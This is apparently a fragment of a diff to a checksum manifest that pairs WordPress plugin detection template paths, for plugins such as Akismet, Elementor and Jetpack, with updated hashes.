-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd 